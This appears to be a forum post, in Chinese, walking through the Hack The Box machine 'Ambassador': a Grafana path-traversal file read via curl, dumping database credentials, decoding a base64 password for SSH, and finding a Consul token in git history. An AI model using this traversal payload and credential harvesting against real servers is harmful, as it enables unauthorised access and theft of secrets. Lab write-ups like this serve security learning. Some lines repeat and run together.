-
-
[原创]HTB Ambassador(MEDIUM)
-
发表于: 2022-12-19 16:54
-
参考链接:
https://www.youtube.com/watch?v=QSITYrzRd0U
访问站点可以看到这样的一个文章
访问3000端口 可以看到使用了grafana
Grafana 存在未经授权的任意文件读取
https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
不使用msf
获得数据库密码dontStandSoCloseToMe63221!
获得
使用developer密码ssh连上去
ssh developer@10.10.11.183
到/opt/目录看一下
大佬说:一般运维都喜欢把项目,源码,配置文件之类的丢这里
发现有consul和my-app,先进my-app看一下
发现有.git,看一下
发现 一个 token bb03b43b-1d81-d62b-24b5-39540ee469b5
CONSUL的默认访问端口为8500,设置端口转发
打通了之后sessions一下
rustscan 10.10.11.183
rustscan 10.10.11.183
searchsploit grafanasearchsploit grafanacurl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
sudo cp /root/.msf4/loot/20221219021334_default_10.10.11.183_grafana.loot_481578.db .
sudo cp /root/.msf4/loot/20221219021334_default_10.10.11.183_grafana.loot_481578.db .
mysql -u grafana -pdontStandSoCloseToMe63221! -h 10.10.11.183
show databases;use whackywidget;show tables;select * from users;
mysql -u grafana -pdontStandSoCloseToMe63221! -h 10.10.11.183
show databases;use whackywidget;show tables;select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
echo 'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==' | base64 -d
anEnglishManInNewYork027468echo 'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==' | base64 -d
anEnglishManInNewYork027468commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>Date: Sun Mar 13 23:47:36 2022 +0000
tidy config script
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2022-12-29 14:27
被hml189编辑
,原因:
|
|
|---|---|
